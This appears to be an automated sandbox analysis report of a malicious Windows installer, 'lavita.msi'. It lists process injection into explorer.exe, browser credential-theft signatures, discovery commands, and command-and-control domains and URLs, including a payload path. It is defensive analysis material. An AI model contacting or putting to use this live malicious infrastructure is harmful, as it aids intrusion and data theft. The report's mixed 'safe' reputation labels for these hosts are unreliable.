            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576900 Sample: lavita.msi Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 72 proliforetka.com 2->72 74 dogirafer.com 2->74 76 3 other IPs or domains 2->76 90 Suricata IDS alerts for network traffic 2->90 92 Found malware configuration 2->92 94 Malicious sample detected (through community Yara rule) 2->94 96 7 other signatures 2->96 11 msiexec.exe 15 40 2->11         started        14 msiexec.exe 2 2->14         started        signatures3 process4 file5 60 C:\Windows\Installer\MSIC3DE.tmp, PE32 11->60 dropped 62 C:\Windows\Installer\MSIC39F.tmp, PE32 11->62 dropped 64 C:\Windows\Installer\MSIC35F.tmp, PE32 11->64 dropped 66 2 other files (none is malicious) 11->66 dropped 16 rundll32.exe 8 14 11->16         started        20 msiexec.exe 11->20         started        process6 dnsIp7 68 cronoze.com 94.232.40.41, 49843, 50011, 8817 WELLWEBNL Russian Federation 16->68 70 muuxxu.com 94.232.46.11, 49709, 49733, 49952 WELLWEBNL Russian Federation 16->70 82 System process connects to network (likely due to code injection or exploit) 16->82 84 Contains functionality to inject threads in other processes 16->84 86 Injects code into the Windows Explorer (explorer.exe) 16->86 88 6 other signatures 16->88 22 explorer.exe 52 10 16->22 injected signatures8 process9 dnsIp10 78 dogirafer.com 104.21.16.1, 443, 49959, 49965 CLOUDFLARENETUS United States 22->78 80 proliforetka.com 172.67.161.60, 443, 49935, 49942 CLOUDFLARENETUS United States 22->80 106 System process connects to network (likely due to code injection or exploit) 22->106 108 Checks if browser processes are running 22->108 110 Contains functionality to steal Internet Explorer form passwords 22->110 112 Tries to harvest and steal browser information (history, passwords, etc) 22->112 26 cmd.exe 1 22->26         started        29 cmd.exe 1 22->29         started        31 cmd.exe 22->31         started        33 7 other processes 22->33 signatures11 process12 signatures13 114 Uses net.exe to modify the status of services 26->114 116 Uses ipconfig to lookup or modify the Windows network settings 26->116 118 Performs a network lookup / discovery via net view 26->118 50 2 other processes 26->50 35 net.exe 29->35         started        38 conhost.exe 29->38         started        40 WMIC.exe 31->40         started        42 findstr.exe 31->42         started        44 conhost.exe 31->44         started        120 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 33->120 46 systeminfo.exe 2 1 33->46         started        48 net.exe 33->48         started        52 11 other processes 33->52 process14 signatures15 98 Writes to foreign memory regions 35->98 100 Allocates memory in foreign processes 35->100 54 net1.exe 35->54         started        102 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 40->102 104 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 46->104 56 WmiPrvSE.exe 46->56         started        58 net1.exe 48->58         started        process16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            lavita.msi0%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\gpuset\appgpuset.dll0%ReversingLabs
            C:\Windows\Installer\MSIC2F1.tmp0%ReversingLabs
            C:\Windows\Installer\MSIC35F.tmp0%ReversingLabs
            C:\Windows\Installer\MSIC39F.tmp0%ReversingLabs
            C:\Windows\Installer\MSIC3DE.tmp0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://cronoze.com:8817/pentium.php0%Avira URL Cloudsafe
            https://word.office.comM0%Avira URL Cloudsafe
            https://muuxxu.com:8817/pentium.phpW0%Avira URL Cloudsafe
            https://muuxxu.com:8817/e0%Avira URL Cloudsafe
            https://proliforetka.com/test/D0%Avira URL Cloudsafe
            https://proliforetka.com/test/60%Avira URL Cloudsafe
            https://muuxxu.com:8817/pentium.php0%Avira URL Cloudsafe
            https://cronoze.com/90%Avira URL Cloudsafe
            https://proliforetka.com/test/P0%Avira URL Cloudsafe
            https://dogirafer.com/test/8713781_55685573550420_1137939URLS1https://proliforetka.com/test/4803877_100%Avira URL Cloudmalware
            https://cronoze.com/-0%Avira URL Cloudsafe
            https://proliforetka.com/test/MenuArray_2056180%Avira URL Cloudsafe
            https://proliforetka.com/710%Avira URL Cloudsafe
            https://muuxxu.com:8817/0%Avira URL Cloudsafe
            https://proliforetka.com/10%Avira URL Cloudsafe
            https://dogirafer.com/files/stkm.binb0%Avira URL Cloudsafe
            https://dogirafer.com/test/876227_481825193277_5070988URLS1https://proliforetka.com/test/6581893_513100%Avira URL Cloudmalware
            https://muuxxu.com:8817/intel.php0%Avira URL Cloudsafe
            https://dogirafer.com/test/100%Avira URL Cloudmalware
            https://proliforetka.com/F0%Avira URL Cloudsafe
            https://dogirafer.com/0%Avira URL Cloudsafe
            https://proliforetka.com/0%Avira URL Cloudsafe
            https://muuxxu.com:8817/intel.phpom:8817/intel.phpWC0%Avira URL Cloudsafe
            https://cronoze.com:8817/0%Avira URL Cloudsafe
            https://cronoze.com:8817/intel.phpC0%Avira URL Cloudsafe
            https://dogirafer.com/test/stkm.binDS&s100%Avira URL Cloudmalware
            https://muuxxu.com:8817/pentium.phpgW0%Avira URL Cloudsafe
            https://proliforetka.com/test/y0%Avira URL Cloudsafe
            https://proliforetka.com/test/10%Avira URL Cloudsafe
            http://r11.o.lencr.org0#0%Avira URL Cloudsafe
            https://muuxxu.com:8817/intel.phpCC0%Avira URL Cloudsafe
            https://proliforetka.com/_0%Avira URL Cloudsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz0%Avira URL Cloudsafe
            https://cronoze.com:8817/intel.phpM0%Avira URL Cloudsafe
            https://excel.office.com-0%Avira URL Cloudsafe
            https://muuxxu.com:8817/intel.phpPC0%Avira URL Cloudsafe
            https://proliforetka.com/test/0%Avira URL Cloudsafe
            https://dogirafer.com/files/stkm.binw0%Avira URL Cloudsafe
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark0%Avira URL Cloudsafe
            https://dogirafer.com/test/8085467_13561511323361_4058196URLS1https://proliforetka.com/test/775166_4100%Avira URL Cloudmalware
            https://proliforetka.com/SIE0%Avira URL Cloudsafe
            https://muuxxu.com/0%Avira URL Cloudsafe
            https://dogirafer.com/est/0%Avira URL Cloudsafe
            https://cronoze.com:8817/intel.php0%Avira URL Cloudsafe
            https://dogirafer.com/files/stkm.bin0%Avira URL Cloudsafe
            https://powerpoint.office.comEMd0%Avira URL Cloudsafe
            https://dogirafer.com/test/t/100%Avira URL Cloudmalware
            https://proliforetka.com/u0%Avira URL Cloudsafe
            https://proliforetka.com/test/r0%Avira URL Cloudsafe
            https://cronoze.com:8817/M0%Avira URL Cloudsafe
            https://outlook.come0%Avira URL Cloudsafe
            https://www.advancedinstaller.com0%Avira URL Cloudsafe
            https://proliforetka.com/r0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            		199.232.210.172
            		truefalse
              		high
              cronoze.com
              		94.232.40.41
              		truefalse
                		high
                proliforetka.com
                		172.67.161.60
                		truetrue
                  		unknown
                  muuxxu.com
                  		94.232.46.11
                  		truefalse
                    		high
                    dogirafer.com
                    		104.21.16.1
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://dogirafer.com/test/true
                      • Avira URL Cloud: malware
                      		unknown
                      https://proliforetka.com/test/true
                      • Avira URL Cloud: safe
                      		unknown
                      https://dogirafer.com/files/stkm.bintrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        https://muuxxu.com:8817/erundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://proliforetka.com/test/6explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.msn.com/Iexplorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://dogirafer.com/test/8713781_55685573550420_1137939URLS1https://proliforetka.com/test/4803877_explorer.exe, 00000007.00000003.3496211531.0000000008BA0000.00000040.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://muuxxu.com:8817/pentium.phprundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://cronoze.com/9rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://muuxxu.com:8817/pentium.phpWrundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4606667288.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000973C000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://word.office.comMexplorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2405576453.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cronoze.com:8817/pentium.phprundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://proliforetka.com/test/Dexplorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.microexplorer.exe, 00000007.00000000.2402016774.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2399887096.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2402033911.0000000007B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://proliforetka.com/test/Pexplorer.exe, 00000007.00000002.4601834591.00000000032B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://proliforetka.com/71explorer.exe, 00000007.00000002.4615738228.000000000C3AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cronoze.com/-rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://proliforetka.com/test/MenuArray_205618explorer.exe, 00000007.00000002.4616007306.000000000C474000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://dogirafer.com/test/876227_481825193277_5070988URLS1https://proliforetka.com/test/6581893_513explorer.exe, 00000007.00000003.3278360370.0000000002FE0000.00000040.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://proliforetka.com/Fexplorer.exe, 00000007.00000003.4387418661.000000000C488000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://dogirafer.com/files/stkm.binbexplorer.exe, 00000007.00000002.4615831283.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387315831.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387199626.000000000C3A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3457537830.000000000C3C8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://muuxxu.com:8817/intel.phprundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://x1.c.lencr.org/0rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F434000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349191347.000001DA034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349400263.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4597607083.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F425000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2394466415.000001DA7F42A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://x1.i.lencr.org/0rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F434000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349191347.000001DA034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349400263.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4597607083.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F425000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2394466415.000001DA7F42A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://muuxxu.com:8817/rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://proliforetka.com/1explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387199626.000000000C3A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://dogirafer.com/explorer.exe, 00000007.00000002.4615738228.000000000C3AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387199626.000000000C3A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://proliforetka.com/explorer.exe, 00000007.00000002.4615738228.000000000C3AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4615738228.000000000C383000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387418661.000000000C488000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4616007306.000000000C474000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4387199626.000000000C3A8000.00000004.00000001.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://wns.windows.com/eexplorer.exe, 00000007.00000003.4387068567.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4610617935.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2403423241.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979103692.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://muuxxu.com:8817/intel.phpom:8817/intel.phpWCrundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cronoze.com:8817/rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://proliforetka.com/test/1explorer.exe, 00000007.00000002.4616007306.000000000C474000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cronoze.com:8817/intel.phpCrundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://proliforetka.com/test/yexplorer.exe, 00000007.00000002.4614759735.000000000C354000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://r11.o.lencr.org0#rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F434000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349191347.000001DA034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349400263.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4597607083.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://dogirafer.com/test/stkm.binDS&sexplorer.exe, 00000007.00000003.3457537830.000000000C3C8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://muuxxu.com:8817/pentium.phpgWrundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://muuxxu.com:8817/intel.phpCCrundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://proliforetka.com/_explorer.exe, 00000007.00000002.4615738228.000000000C383000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4386958155.000000000C381000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cronoze.com:8817/intel.phpMrundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://excel.office.com-explorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2405576453.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://muuxxu.com:8817/intel.phpPCrundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://r11.i.lencr.org/0rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F434000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349191347.000001DA034F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3349400263.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4597607083.000001DA031D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dogirafer.com/files/stkm.binwexplorer.exe, 00000007.00000003.3457537830.000000000C3C8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://dogirafer.com/test/8085467_13561511323361_4058196URLS1https://proliforetka.com/test/775166_4explorer.exe, 00000007.00000003.3556892148.0000000008F60000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://proliforetka.com/SIEexplorer.exe, 00000007.00000002.4616007306.000000000C474000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://muuxxu.com/rundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://dogirafer.com/est/explorer.exe, 00000007.00000002.4587902556.0000000000D99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cronoze.com:8817/intel.phprundll32.exe, 00000004.00000002.4600769204.000001DA7F3A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4600769204.000001DA7F34D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://powerpoint.office.comEMdexplorer.exe, 00000007.00000000.2405576453.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4614759735.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.thawte.com/cps0/lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drfalse
                                                                      		high
                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000007.00000000.2405576453.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://cronoze.com:8817/Mrundll32.exe, 00000004.00000002.4600769204.000001DA7F3E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.thawte.com/repository0Wlavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drfalse
                                                                          		high
                                                                          https://outlook.comeexplorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2405576453.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
